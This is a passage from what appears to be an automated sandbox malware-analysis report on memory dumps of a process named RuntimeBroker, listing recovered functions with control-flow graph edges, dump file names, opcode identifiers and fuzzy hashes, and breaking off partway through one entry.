                                                                                                                                      control_flow_graph 403 7ffd9b894a02-7ffd9b894a35 405 7ffd9b894a3f-7ffd9b894a78 403->405 407 7ffd9b894a86-7ffd9b894a8d 405->407 408 7ffd9b894a7a-7ffd9b894a84 405->408 409 7ffd9b894aad-7ffd9b894f8c 407->409 410 7ffd9b894a8f-7ffd9b894c74 407->410 408->407 409->407 417 7ffd9b894f92-7ffd9b894f9c 409->417 410->407 415 7ffd9b894c7a-7ffd9b894c84 410->415 415->407 417->407
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction ID: 4e0f4fe64aea6ad4236fe90158fee17b74f40b1303a9f276293543852cdea031
                                                                                                                                      • Opcode Fuzzy Hash: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction Fuzzy Hash: E0310370A1962D8FEBB8DB54C8A47A9B7F1FF49300F1041E9D04DA2291DB786BC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B894AB9 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 418 7ffd9b894ab9-7ffd9b894ac2 420 7ffd9b894acd-7ffd9b894b0c 418->420 422 7ffd9b894a86-7ffd9b894a8d 420->422 423 7ffd9b894b12-7ffd9b894b1c 420->423 424 7ffd9b894aad-7ffd9b894f8c 422->424 425 7ffd9b894a8f-7ffd9b894c74 422->425 423->422 424->422 432 7ffd9b894f92-7ffd9b894f9c 424->432 425->422 430 7ffd9b894c7a-7ffd9b894c84 425->430 430->422 432->422
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: 111eade1d85496f17a1b5b37a15ded02e881aba5c8b45211e355e1e47b7e3657
                                                                                                                                      • Instruction ID: da2f7102d7140afc8d291e74577f2382fc3fe1e26ffe2646bbdbf67258b7c6f3
                                                                                                                                      • Opcode Fuzzy Hash: 111eade1d85496f17a1b5b37a15ded02e881aba5c8b45211e355e1e47b7e3657
                                                                                                                                      • Instruction Fuzzy Hash: 5B011A30E4561E8EEBB8DF54C8987E8B6F1EB59341F1542FAD05CD22A1DA741AC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B899F14 Relevance: .6, Instructions: 635COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 433 7ffd9b899f14-7ffd9b899f23 434 7ffd9b899f25 433->434 435 7ffd9b899f2a-7ffd9b89b177 call 7ffd9b89c00a 433->435 434->435 440 7ffd9b89b179-7ffd9b89b187 435->440 441 7ffd9b89b192-7ffd9b89b21b 440->441 445 7ffd9b89b221-7ffd9b89b2aa 441->445 446 7ffd9b89b2b3-7ffd9b89b2d5 441->446 445->446 467 7ffd9b89b2ac 445->467 449 7ffd9b89b426-7ffd9b89b4bc 446->449 450 7ffd9b89b2db-7ffd9b89b326 446->450 469 7ffd9b89b57f-7ffd9b89b5c5 449->469 470 7ffd9b89b4c2-7ffd9b89b4ce 449->470 460 7ffd9b89b40d-7ffd9b89b41a 450->460 462 7ffd9b89b32b-7ffd9b89b339 460->462 463 7ffd9b89b420-7ffd9b89b421 460->463 465 7ffd9b89b33b 462->465 466 7ffd9b89b340-7ffd9b89b3a2 462->466 464 7ffd9b89b734-7ffd9b89b793 463->464 486 7ffd9b89ba5b-7ffd9b89ba88 464->486 465->466 476 7ffd9b89b3a9-7ffd9b89b3fb 466->476 477 7ffd9b89b3a4 466->477 467->446 487 7ffd9b89b5cc-7ffd9b89b5d2 469->487 478 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 470->478 479 7ffd9b89b4d0-7ffd9b89b51c 470->479 499 7ffd9b89b405-7ffd9b89b40a 476->499 500 7ffd9b89b3fd-7ffd9b89b402 476->500 477->476 478->487 479->478 494 7ffd9b89b798-7ffd9b89b7d4 486->494 495 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 486->495 490 7ffd9b89b721-7ffd9b89b72e 487->490 490->464 492 7ffd9b89b5d7-7ffd9b89b5e5 490->492 496 7ffd9b89b5e7 492->496 497 7ffd9b89b5ec-7ffd9b89b646 492->497 505 7ffd9b89b7d6-7ffd9b89b7ed 494->505 506 7ffd9b89b7f1-7ffd9b89ba58 494->506 518 7ffd9b89babb-7ffd9b89baef 495->518 519 7ffd9b89bab4 495->519 496->497 511 7ffd9b89b6b6-7ffd9b89b6de 497->511 512 7ffd9b89b648-7ffd9b89b670 497->512 499->460 500->499 505->506 506->486 516 7ffd9b89b6e5-7ffd9b89b70e 511->516 517 7ffd9b89b6e0 511->517 514 7ffd9b89b677-7ffd9b89b6b4 512->514 515 7ffd9b89b672 512->515 528 7ffd9b89b719-7ffd9b89b71e 514->528 515->514 516->528 517->516 522 7ffd9b89bb0f-7ffd9b89bb35 518->522 523 7ffd9b89baf1-7ffd9b89bafe 518->523 519->518 525 7ffd9b89bb05-7ffd9b89bb0d 523->525 526 7ffd9b89bb00 523->526 525->522 526->525 528->490
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 84df80354a40980ed7238a36ea15a4be09c502b692e4edbb32b51303d0058553
                                                                                                                                      • Instruction ID: 6fcd7e5ec763355a8440d845f9039f514b3bfdbd519fb11f948160f70afc2e74
                                                                                                                                      • Opcode Fuzzy Hash: 84df80354a40980ed7238a36ea15a4be09c502b692e4edbb32b51303d0058553
                                                                                                                                      • Instruction Fuzzy Hash: 3C42AC70A0991D8FDFA8DF58C895AA9B7B2FF98301F1141E9D00DD72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C527D Relevance: .4, Instructions: 367COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction ID: 88611a6c14a18fce6b6c5543a0fc41ea59210c147374c3482326d47b819cf9e6
                                                                                                                                      • Opcode Fuzzy Hash: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction Fuzzy Hash: 09D15DB1E1964D8FEB58EB58C8A5BF8B7B1FF58300F4401BAD00D972E2DA346981CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AFA6 Relevance: .4, Instructions: 365COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 704 7ffd9b89afa6-7ffd9b89afcf 706 7ffd9b89afe2 704->706 707 7ffd9b89afd1 704->707 708 7ffd9b89b031-7ffd9b89b05f 706->708 709 7ffd9b89afe4-7ffd9b89aff7 706->709 707->706 712 7ffd9b89b0b8-7ffd9b89b0be 708->712 709->708 713 7ffd9b89b0c0-7ffd9b89b0cf 712->713 714 7ffd9b89b061-7ffd9b89b09c 712->714 716 7ffd9b89b0ff-7ffd9b89b10b 713->716 717 7ffd9b89b09e 714->717 718 7ffd9b89b0a3-7ffd9b89b0b5 714->718 719 7ffd9b89b116-7ffd9b89b134 716->719 717->718 718->712 721 7ffd9b89b137-7ffd9b89b13d 719->721 722 7ffd9b89ad54-7ffd9b89add4 721->722 723 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 721->723 732 7ffd9b89add6-7ffd9b89ade2 722->732 733 7ffd9b89ae04-7ffd9b89ae13 722->733 734 7ffd9b89b179-7ffd9b89b187 723->734 740 7ffd9b89ae31-7ffd9b89ae39 732->740 741 7ffd9b89ade4-7ffd9b89adf9 732->741 736 7ffd9b89ae15 733->736 737 7ffd9b89ae1a-7ffd9b89ae29 733->737 742 7ffd9b89b192-7ffd9b89b21b 734->742 736->737 738 7ffd9b89ae2b-7ffd9b89ae2c 737->738 739 7ffd9b89ae3e-7ffd9b89ae59 737->739 738->740 743 7ffd9b89ae79-7ffd9b89b0dd 739->743 744 7ffd9b89ae5b-7ffd9b89ae75 739->744 740->719 741->733 754 7ffd9b89b221-7ffd9b89b2aa 742->754 755 7ffd9b89b2b3-7ffd9b89b2d5 742->755 749 7ffd9b89b12c-7ffd9b89b134 743->749 750 7ffd9b89b0df-7ffd9b89b0f4 743->750 744->743 749->721 750->716 754->755 776 7ffd9b89b2ac 754->776 758 7ffd9b89b426-7ffd9b89b4bc 755->758 759 7ffd9b89b2db-7ffd9b89b326 755->759 778 7ffd9b89b57f-7ffd9b89b5c5 758->778 779 7ffd9b89b4c2-7ffd9b89b4ce 758->779 769 7ffd9b89b40d-7ffd9b89b41a 759->769 771 7ffd9b89b32b-7ffd9b89b339 769->771 772 7ffd9b89b420-7ffd9b89b421 769->772 774 7ffd9b89b33b 771->774 775 7ffd9b89b340-7ffd9b89b3a2 771->775 773 7ffd9b89b734-7ffd9b89b793 772->773 795 7ffd9b89ba5b-7ffd9b89ba88 773->795 774->775 785 7ffd9b89b3a9-7ffd9b89b3fb 775->785 786 7ffd9b89b3a4 775->786 776->755 796 7ffd9b89b5cc-7ffd9b89b5d2 778->796 787 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 779->787 788 7ffd9b89b4d0-7ffd9b89b51c 779->788 808 7ffd9b89b405-7ffd9b89b40a 785->808 809 7ffd9b89b3fd-7ffd9b89b402 785->809 786->785 787->796 788->787 803 7ffd9b89b798-7ffd9b89b7d4 795->803 804 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 795->804 799 7ffd9b89b721-7ffd9b89b72e 796->799 799->773 801 7ffd9b89b5d7-7ffd9b89b5e5 799->801 805 7ffd9b89b5e7 801->805 806 7ffd9b89b5ec-7ffd9b89b646 801->806 814 7ffd9b89b7d6-7ffd9b89b7ed 803->814 815 7ffd9b89b7f1-7ffd9b89ba58 803->815 827 7ffd9b89babb-7ffd9b89baef 804->827 828 7ffd9b89bab4 804->828 805->806 820 7ffd9b89b6b6-7ffd9b89b6de 806->820 821 7ffd9b89b648-7ffd9b89b670 806->821 808->769 809->808 814->815 815->795 825 7ffd9b89b6e5-7ffd9b89b70e 820->825 826 7ffd9b89b6e0 820->826 823 7ffd9b89b677-7ffd9b89b6b4 821->823 824 7ffd9b89b672 821->824 837 7ffd9b89b719-7ffd9b89b71e 823->837 824->823 825->837 826->825 831 7ffd9b89bb0f-7ffd9b89bb35 827->831 832 7ffd9b89baf1-7ffd9b89bafe 827->832 828->827 834 7ffd9b89bb05-7ffd9b89bb0d 832->834 835 7ffd9b89bb00 832->835 834->831 835->834 837->799
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: de887a0734d55986ecddaf625ce94ff98b591df96bc8b4601230073f966cf129
                                                                                                                                      • Instruction ID: cb109a2f1aa1cbc9a09e43acdc995f5d06cfc7eb49215851c1de0c8345f999e5
                                                                                                                                      • Opcode Fuzzy Hash: de887a0734d55986ecddaf625ce94ff98b591df96bc8b4601230073f966cf129
                                                                                                                                      • Instruction Fuzzy Hash: F6E1DC70A0991D8FDFA8DF58C895AA9B7B1FF98300F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AFFB Relevance: .3, Instructions: 324COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 881 7ffd9b89affb-7ffd9b89affd 882 7ffd9b89b07a-7ffd9b89b07c 881->882 883 7ffd9b89afff-7ffd9b89b011 881->883 885 7ffd9b89b085-7ffd9b89b09c 882->885 884 7ffd9b89b0ff-7ffd9b89b10b 883->884 888 7ffd9b89b116-7ffd9b89b134 884->888 886 7ffd9b89b09e 885->886 887 7ffd9b89b0a3-7ffd9b89b0be 885->887 886->887 890 7ffd9b89b0c0-7ffd9b89b0cf 887->890 891 7ffd9b89b061-7ffd9b89b079 887->891 893 7ffd9b89b137-7ffd9b89b13d 888->893 890->884 891->885 894 7ffd9b89ad54-7ffd9b89add4 893->894 895 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 893->895 904 7ffd9b89add6-7ffd9b89ade2 894->904 905 7ffd9b89ae04-7ffd9b89ae13 894->905 906 7ffd9b89b179-7ffd9b89b187 895->906 912 7ffd9b89ae31-7ffd9b89ae39 904->912 913 7ffd9b89ade4-7ffd9b89adf9 904->913 908 7ffd9b89ae15 905->908 909 7ffd9b89ae1a-7ffd9b89ae29 905->909 914 7ffd9b89b192-7ffd9b89b21b 906->914 908->909 910 7ffd9b89ae2b-7ffd9b89ae2c 909->910 911 7ffd9b89ae3e-7ffd9b89ae59 909->911 910->912 915 7ffd9b89ae79-7ffd9b89b0dd 911->915 916 7ffd9b89ae5b-7ffd9b89ae75 911->916 912->888 913->905 926 7ffd9b89b221-7ffd9b89b2aa 914->926 927 7ffd9b89b2b3-7ffd9b89b2d5 914->927 921 7ffd9b89b12c-7ffd9b89b134 915->921 922 7ffd9b89b0df-7ffd9b89b0f4 915->922 916->915 921->893 922->884 926->927 948 7ffd9b89b2ac 926->948 930 7ffd9b89b426-7ffd9b89b4bc 927->930 931 7ffd9b89b2db-7ffd9b89b326 927->931 950 7ffd9b89b57f-7ffd9b89b5c5 930->950 951 7ffd9b89b4c2-7ffd9b89b4ce 930->951 941 7ffd9b89b40d-7ffd9b89b41a 931->941 943 7ffd9b89b32b-7ffd9b89b339 941->943 944 7ffd9b89b420-7ffd9b89b421 941->944 946 7ffd9b89b33b 943->946 947 7ffd9b89b340-7ffd9b89b3a2 943->947 945 7ffd9b89b734-7ffd9b89b793 944->945 967 7ffd9b89ba5b-7ffd9b89ba88 945->967 946->947 957 7ffd9b89b3a9-7ffd9b89b3fb 947->957 958 7ffd9b89b3a4 947->958 948->927 968 7ffd9b89b5cc-7ffd9b89b5d2 950->968 959 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 951->959 960 7ffd9b89b4d0-7ffd9b89b51c 951->960 980 7ffd9b89b405-7ffd9b89b40a 957->980 981 7ffd9b89b3fd-7ffd9b89b402 957->981 958->957 959->968 960->959 975 7ffd9b89b798-7ffd9b89b7d4 967->975 976 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 967->976 971 7ffd9b89b721-7ffd9b89b72e 968->971 971->945 973 7ffd9b89b5d7-7ffd9b89b5e5 971->973 977 7ffd9b89b5e7 973->977 978 7ffd9b89b5ec-7ffd9b89b646 973->978 986 7ffd9b89b7d6-7ffd9b89b7ed 975->986 987 7ffd9b89b7f1-7ffd9b89ba58 975->987 999 7ffd9b89babb-7ffd9b89baef 976->999 1000 7ffd9b89bab4 976->1000 977->978 992 7ffd9b89b6b6-7ffd9b89b6de 978->992 993 7ffd9b89b648-7ffd9b89b670 978->993 980->941 981->980 986->987 987->967 997 7ffd9b89b6e5-7ffd9b89b70e 992->997 998 7ffd9b89b6e0 992->998 995 7ffd9b89b677-7ffd9b89b6b4 993->995 996 7ffd9b89b672 993->996 1009 7ffd9b89b719-7ffd9b89b71e 995->1009 996->995 997->1009 998->997 1003 7ffd9b89bb0f-7ffd9b89bb35 999->1003 1004 7ffd9b89baf1-7ffd9b89bafe 999->1004 1000->999 1006 7ffd9b89bb05-7ffd9b89bb0d 1004->1006 1007 7ffd9b89bb00 1004->1007 1006->1003 1007->1006 1009->971
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 570c67bccf66c45cf218fc04158b7bde5ab87df324fff1a5da30cb3eb3826ad5
                                                                                                                                      • Instruction ID: 864a7eb2702c74e43819b2febe1282d05abdbb8caf7f96eaceaa2415d844f2c9
                                                                                                                                      • Opcode Fuzzy Hash: 570c67bccf66c45cf218fc04158b7bde5ab87df324fff1a5da30cb3eb3826ad5
                                                                                                                                      • Instruction Fuzzy Hash: 22D1D970E0991D8FDFA8DF58C894AA9B7B1FF98301F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89B016 Relevance: .3, Instructions: 321COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1011 7ffd9b89b016-7ffd9b89b05f 1014 7ffd9b89b0b8-7ffd9b89b0be 1011->1014 1015 7ffd9b89b0c0-7ffd9b89b0cf 1014->1015 1016 7ffd9b89b061-7ffd9b89b09c 1014->1016 1018 7ffd9b89b0ff-7ffd9b89b10b 1015->1018 1019 7ffd9b89b09e 1016->1019 1020 7ffd9b89b0a3-7ffd9b89b0b5 1016->1020 1021 7ffd9b89b116-7ffd9b89b134 1018->1021 1019->1020 1020->1014 1023 7ffd9b89b137-7ffd9b89b13d 1021->1023 1024 7ffd9b89ad54-7ffd9b89add4 1023->1024 1025 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 1023->1025 1034 7ffd9b89add6-7ffd9b89ade2 1024->1034 1035 7ffd9b89ae04-7ffd9b89ae13 1024->1035 1036 7ffd9b89b179-7ffd9b89b187 1025->1036 1042 7ffd9b89ae31-7ffd9b89ae39 1034->1042 1043 7ffd9b89ade4-7ffd9b89adf9 1034->1043 1038 7ffd9b89ae15 1035->1038 1039 7ffd9b89ae1a-7ffd9b89ae29 1035->1039 1044 7ffd9b89b192-7ffd9b89b21b 1036->1044 1038->1039 1040 7ffd9b89ae2b-7ffd9b89ae2c 1039->1040 1041 7ffd9b89ae3e-7ffd9b89ae59 1039->1041 1040->1042 1045 7ffd9b89ae79-7ffd9b89b0dd 1041->1045 1046 7ffd9b89ae5b-7ffd9b89ae75 1041->1046 1042->1021 1043->1035 1056 7ffd9b89b221-7ffd9b89b2aa 1044->1056 1057 7ffd9b89b2b3-7ffd9b89b2d5 1044->1057 1051 7ffd9b89b12c-7ffd9b89b134 1045->1051 1052 7ffd9b89b0df-7ffd9b89b0f4 1045->1052 1046->1045 1051->1023 1052->1018 1056->1057 1078 7ffd9b89b2ac 1056->1078 1060 7ffd9b89b426-7ffd9b89b4bc 1057->1060 1061 7ffd9b89b2db-7ffd9b89b326 1057->1061 1080 7ffd9b89b57f-7ffd9b89b5c5 1060->1080 1081 7ffd9b89b4c2-7ffd9b89b4ce 1060->1081 1071 7ffd9b89b40d-7ffd9b89b41a 1061->1071 1073 7ffd9b89b32b-7ffd9b89b339 1071->1073 1074 7ffd9b89b420-7ffd9b89b421 1071->1074 1076 7ffd9b89b33b 1073->1076 1077 7ffd9b89b340-7ffd9b89b3a2 1073->1077 1075 7ffd9b89b734-7ffd9b89b793 1074->1075 1097 7ffd9b89ba5b-7ffd9b89ba88 1075->1097 1076->1077 1087 7ffd9b89b3a9-7ffd9b89b3fb 1077->1087 1088 7ffd9b89b3a4 1077->1088 1078->1057 1098 7ffd9b89b5cc-7ffd9b89b5d2 1080->1098 1089 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 1081->1089 1090 7ffd9b89b4d0-7ffd9b89b51c 1081->1090 1110 7ffd9b89b405-7ffd9b89b40a 1087->1110 1111 7ffd9b89b3fd-7ffd9b89b402 1087->1111 1088->1087 1089->1098 1090->1089 1105 7ffd9b89b798-7ffd9b89b7d4 1097->1105 1106 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 1097->1106 1101 7ffd9b89b721-7ffd9b89b72e 1098->1101 1101->1075 1103 7ffd9b89b5d7-7ffd9b89b5e5 1101->1103 1107 7ffd9b89b5e7 1103->1107 1108 7ffd9b89b5ec-7ffd9b89b646 1103->1108 1116 7ffd9b89b7d6-7ffd9b89b7ed 1105->1116 1117 7ffd9b89b7f1-7ffd9b89ba58 1105->1117 1129 7ffd9b89babb-7ffd9b89baef 1106->1129 1130 7ffd9b89bab4 1106->1130 1107->1108 1122 7ffd9b89b6b6-7ffd9b89b6de 1108->1122 1123 7ffd9b89b648-7ffd9b89b670 1108->1123 1110->1071 1111->1110 1116->1117 1117->1097 1127 7ffd9b89b6e5-7ffd9b89b70e 1122->1127 1128 7ffd9b89b6e0 1122->1128 1125 7ffd9b89b677-7ffd9b89b6b4 1123->1125 1126 7ffd9b89b672 1123->1126 1139 7ffd9b89b719-7ffd9b89b71e 1125->1139 1126->1125 1127->1139 1128->1127 1133 7ffd9b89bb0f-7ffd9b89bb35 1129->1133 1134 7ffd9b89baf1-7ffd9b89bafe 1129->1134 1130->1129 1136 7ffd9b89bb05-7ffd9b89bb0d 1134->1136 1137 7ffd9b89bb00 1134->1137 1136->1133 1137->1136 1139->1101
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2ff6240ab3b90d01ef98cb4311e3f666273ebe2efbd0473322adfa638d369d29
                                                                                                                                      • Instruction ID: 960919a96835a0ea53798ec41b97c28acff5806f20bc49d019661205e5afdfa6
                                                                                                                                      • Opcode Fuzzy Hash: 2ff6240ab3b90d01ef98cb4311e3f666273ebe2efbd0473322adfa638d369d29
                                                                                                                                      • Instruction Fuzzy Hash: C1C1DC70E0991D8FDFA8DF58C895AA9B7B1FF98301F1141A9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89ACC2 Relevance: .3, Instructions: 316COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1141 7ffd9b89acc2-7ffd9b89ad4f 1150 7ffd9b89b137-7ffd9b89b13d 1141->1150 1151 7ffd9b89ad54-7ffd9b89add4 1150->1151 1152 7ffd9b89b143-7ffd9b89b187 call 7ffd9b89c00a 1150->1152 1161 7ffd9b89add6-7ffd9b89ade2 1151->1161 1162 7ffd9b89ae04-7ffd9b89ae13 1151->1162 1172 7ffd9b89b192-7ffd9b89b21b 1152->1172 1169 7ffd9b89ae31-7ffd9b89ae39 1161->1169 1170 7ffd9b89ade4-7ffd9b89adf9 1161->1170 1165 7ffd9b89ae15 1162->1165 1166 7ffd9b89ae1a-7ffd9b89ae29 1162->1166 1165->1166 1167 7ffd9b89ae2b-7ffd9b89ae2c 1166->1167 1168 7ffd9b89ae3e-7ffd9b89ae59 1166->1168 1167->1169 1173 7ffd9b89ae79-7ffd9b89b0dd 1168->1173 1174 7ffd9b89ae5b-7ffd9b89ae75 1168->1174 1171 7ffd9b89b116-7ffd9b89b134 1169->1171 1170->1162 1171->1150 1185 7ffd9b89b221-7ffd9b89b2aa 1172->1185 1186 7ffd9b89b2b3-7ffd9b89b2d5 1172->1186 1180 7ffd9b89b12c-7ffd9b89b134 1173->1180 1181 7ffd9b89b0df-7ffd9b89b10b 1173->1181 1174->1173 1180->1150 1181->1171 1185->1186 1208 7ffd9b89b2ac 1185->1208 1190 7ffd9b89b426-7ffd9b89b4bc 1186->1190 1191 7ffd9b89b2db-7ffd9b89b326 1186->1191 1210 7ffd9b89b57f-7ffd9b89b5c5 1190->1210 1211 7ffd9b89b4c2-7ffd9b89b4ce 1190->1211 1201 7ffd9b89b40d-7ffd9b89b41a 1191->1201 1203 7ffd9b89b32b-7ffd9b89b339 1201->1203 1204 7ffd9b89b420-7ffd9b89b421 1201->1204 1206 7ffd9b89b33b 1203->1206 1207 7ffd9b89b340-7ffd9b89b3a2 1203->1207 1205 7ffd9b89b734-7ffd9b89b793 1204->1205 1227 7ffd9b89ba5b-7ffd9b89ba88 1205->1227 1206->1207 1217 7ffd9b89b3a9-7ffd9b89b3fb 1207->1217 1218 7ffd9b89b3a4 1207->1218 1208->1186 1228 7ffd9b89b5cc-7ffd9b89b5d2 1210->1228 1219 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 1211->1219 1220 7ffd9b89b4d0-7ffd9b89b51c 1211->1220 1240 7ffd9b89b405-7ffd9b89b40a 1217->1240 1241 7ffd9b89b3fd-7ffd9b89b402 1217->1241 1218->1217 1219->1228 1220->1219 1235 7ffd9b89b798-7ffd9b89b7d4 1227->1235 1236 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 1227->1236 1231 7ffd9b89b721-7ffd9b89b72e 1228->1231 1231->1205 1233 7ffd9b89b5d7-7ffd9b89b5e5 1231->1233 1237 7ffd9b89b5e7 1233->1237 1238 7ffd9b89b5ec-7ffd9b89b646 1233->1238 1246 7ffd9b89b7d6-7ffd9b89b7ed 1235->1246 1247 7ffd9b89b7f1-7ffd9b89ba58 1235->1247 1259 7ffd9b89babb-7ffd9b89baef 1236->1259 1260 7ffd9b89bab4 1236->1260 1237->1238 1252 7ffd9b89b6b6-7ffd9b89b6de 1238->1252 1253 7ffd9b89b648-7ffd9b89b670 1238->1253 1240->1201 1241->1240 1246->1247 1247->1227 1257 7ffd9b89b6e5-7ffd9b89b70e 1252->1257 1258 7ffd9b89b6e0 1252->1258 1255 7ffd9b89b677-7ffd9b89b6b4 1253->1255 1256 7ffd9b89b672 1253->1256 1269 7ffd9b89b719-7ffd9b89b71e 1255->1269 1256->1255 1257->1269 1258->1257 1263 7ffd9b89bb0f-7ffd9b89bb35 1259->1263 1264 7ffd9b89baf1-7ffd9b89bafe 1259->1264 1260->1259 1266 7ffd9b89bb05-7ffd9b89bb0d 1264->1266 1267 7ffd9b89bb00 1264->1267 1266->1263 1267->1266 1269->1231
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e61a615fd47de33443f4fad3e021f4fe5bf0e528628442b7b6edb7321952b346
                                                                                                                                      • Instruction ID: 505ab89cc7352f1225d81dfeef0fca2f67b0d7ece9615f3b51096fd9b5c10313
